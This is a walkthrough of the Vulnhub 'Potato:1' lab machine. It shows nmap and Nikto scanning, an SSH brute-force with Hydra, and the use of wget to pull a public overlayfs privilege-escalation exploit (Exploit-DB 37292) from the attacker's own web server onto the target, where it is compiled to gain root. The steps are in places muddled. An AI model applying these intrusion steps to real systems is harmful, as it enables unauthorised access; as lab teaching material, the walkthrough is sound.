POTATO 1: VULNHUB WALKTHROUGH
Today, let us crack the Potato:1 Machine from Vulnhub.
You can download the machine from here.
- Difficulty: Easy to Medium
- Goal: Get to the root shell i.e.(root@localhost:~#) and then obtain flag under /root.
We will follow the Penetration Testing Execution Standards (PTES) for cracking the machine.
Let us start by gathering information about the machine.First, we should find the IP address assigned to the vulnerable machine.
NetDiscover Tool is an ARP scanner used to identify live hosts in a network.
kali@kali:~$ sudo netdiscover
We thus found the IP address of the machine, which is 192.168.70.130. Now, we must do an NMAP scan to find out the service and ports open in the machine.
[Nmap scan is also a part of Information Gathering]
kali@kali:~$ sudo nmap -sSV -vv -sC -T4 -p- <ip address>
With that, we did a full port scan and found that the machine has 2 open ports, which are 80 & 7120. We can now try to connect to both ports to find any vulnerabilities.
As we could not find anything curious in port 80 when opened via browser, we can move to port 7120 with SSH service open, in search of vulnerabilities.
This method is known as Vulnerability analysis according to PTES.
We can now open the Nikto tool and run a quick scan on the target IP address.
kali@kali:~$ nikto -h <ip address>
No luck!! We cannot find any vulnerability here, either. So, we can now try to brute-force the SSH service in port 7120. To brute-force and crack the SSH credentials, we can use the powerful tool called THC-Hydra.
kali@kali:~$ hydra -s 7120 -l potato -P /home/kali/Desktop/passlist.txt ssh://<ip address>
As you can see in the image above, using root as the username is failing consecutively. This is when the machine description provided by Vulnhub comes into play. We saw the VM name as Potato there.
So, instead of the root when we try using potato as the username, BOOM !! We got the password.
And to be mentioned, we did not use the Rockyou password list which is available in the kali machine by default. Instead, we used Daniel Miessler’s password list and we highly recommend using this as this our personal favorite.
kali@kali:~$ ssh potato@<ip address> -p 7120
Here, we will be having only limited access we also found out that the system runs in Linux Ubuntu version 3.13.0.24 generic.
Now, we can Exploit the machine as mentioned in PTES
A quick search in Google or Exploit-DB will do the trick. From the lists, we can use Overlayfs which is a Local Privilege escalation exploit that affects a few versions of ubuntu. You can find the exploit code here.
Download the file and save it as 37292.c and we are about to compile the exploit code in gcc.
Now we can use SimpleHTTPserver to create a quick web server to host the exploit code.
kali@kali:~/Desktop$ sudo python -m SimpleHTTPServer 80
Open a new terminal and use wget tool to host this exploit code into the webserver.
kali@kali:~/Desktop$ wget http://< your ip address>:80/37292.c
Now we are at the Final stage…!!
Now, we must download the exploit code to the target machine — use the same wget command to download the file from the webserver. But before that, make sure you changed directory to /tmp
potato@ubuntu:~$ cd /tmp
Also, check the presence of downloaded exploit code using the ls command. Compile the exploit code using gcc to exploit the vulnerability we found.
potato@ubuntu:/tmp$ gcc 37292.c -o 37292
If you get the results as in the image, then the exploit code is successfully executed. Upon checking, we can see that the root permission is granted to us now and we can execute any commands.
We can now find the hidden flag and finish the task.
Change the directory to /root and use the ls command to see all the files available in the /root folder.
In the listings, you will find a file named proof.txt in which is the Flag — Task Completed.
Written by: Sunand M. (Information Security Researcher, Clear Infosec)
